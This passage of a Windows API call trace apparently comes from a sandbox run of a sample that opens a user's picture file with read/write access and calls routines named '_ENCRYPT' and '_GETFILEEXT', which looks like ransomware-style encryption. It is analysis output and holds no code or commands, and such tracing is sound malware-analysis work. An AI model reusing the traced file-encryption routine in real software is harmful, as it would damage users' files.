out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0040.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.535] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0040.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x41) returned 0x88e138 [0040.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", cchWideChar=65, lpMultiByteStr=0x88e138, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpUsedDefaultChar=0x0) returned 65 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.537] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\bbtymjaxu4vq024a.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x82) returned 0x7bbc00 [0040.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=65, lpWideCharStr=0x7bbc00, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif") returned 65 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.538] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.540] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.540] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.540] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.541] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.541] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.541] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.541] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.541] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.542] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x34056510, ftLastWriteTime.dwHighDateTime=0x1d5bd80, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 0x7c20c0 [0040.542] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.542] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x34056510, ftLastWriteTime.dwHighDateTime=0x1d5bd80, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 0x7c20c0 [0040.542] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 